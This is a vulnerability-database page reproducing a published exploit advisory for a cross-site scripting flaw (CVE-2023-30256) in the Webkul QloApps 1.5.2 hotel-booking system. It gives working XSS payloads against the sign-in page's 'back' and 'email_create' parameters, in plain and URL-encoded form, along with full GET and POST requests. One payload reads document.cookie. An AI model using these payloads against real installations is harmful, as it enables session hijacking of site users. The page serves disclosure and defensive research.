Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAstik RawatPACKETSTORM:172542
HistoryMay 24, 2023 - 12:00 a.m.

Webkul Qloapps 1.5.2 Cross Site Scripting

2023-05-2400:00:00
Astik Rawat
packetstormsecurity.com
153
webkul qloapps
cross site scripting
xss
php
osl-3.0 licence
vulnerability
proof of concept
payload
exploit
kali linux
cve-2023-30256
hotelcommerce

0.01 Low

EPSS

Percentile

83.7%

JSON
`# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)  
# Date: 15 May 2023  
# Exploit Author: Astik Rawat (ahrixia)  
# Vendor Homepage: https://qloapps.com/  
# Software Link: https://github.com/webkul/hotelcommerce  
# Version: 1.5.2  
# Tested on: Kali Linux 2022.4  
# CVE : CVE-2023-30256  
  
  
Description:  
  
A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.  
  
Steps to exploit:  
1) Go to Signin page on the system.  
2) There are two parameters which can be exploited via XSS  
- back  
- email_create  
  
2.1) Insert your payload in the "back"- GET and POST Request   
Proof of concept (Poc):  
The following payload will allow you to execute XSS -   
  
Payload (Plain text):   
xss onfocus=alert(1) autofocus= xss  
  
Payload (URL Encoded):   
xss%20onfocus%3dalert(1)%20autofocus%3d%20xss  
  
Full GET Request (back):   
[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]  
  
2.2) Insert your payload in the "email_create" - POST Request Only  
Proof of concept (Poc):  
The following payload will allow you to execute XSS -   
  
Payload (Plain text):   
xss><img src=a onerror=alert(document.cookie)>xss  
  
Payload (URL Encoded):   
xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss  
  
POST Request (email_create) (POST REQUEST DATA ONLY):   
[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]  
  
`

Related

zdt 1
osv 1
cve 1
prion 1
nuclei 1
cvelist 1
nvd 1
exploitdb 1
zdt
zdt
Webkul Qloapps 1.5.2 - Cross-Site Scripting Vulnerability
2023-05-23 00:00:00
osv
osv
CVE-2023-30256
2023-05-11 11:15:09
cve
cve
CVE-2023-30256
2023-05-11 11:15:09
prion
prion
Cross site scripting
2023-05-11 11:15:00
nuclei
nuclei
Webkul QloApps 1.5.2 - Cross-site Scripting
2023-07-07 09:38:49
cvelist
cvelist
CVE-2023-30256
2023-05-11 00:00:00
nvd
nvd
CVE-2023-30256
2023-05-11 11:15:09
exploitdb
exploitdb
Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
2023-05-23 00:00:00

0.01 Low

EPSS

Percentile

83.7%

JSON
Related for PACKETSTORM:172542
zdt1osv1cve1prion1nuclei1cvelist1nvd1exploitdb1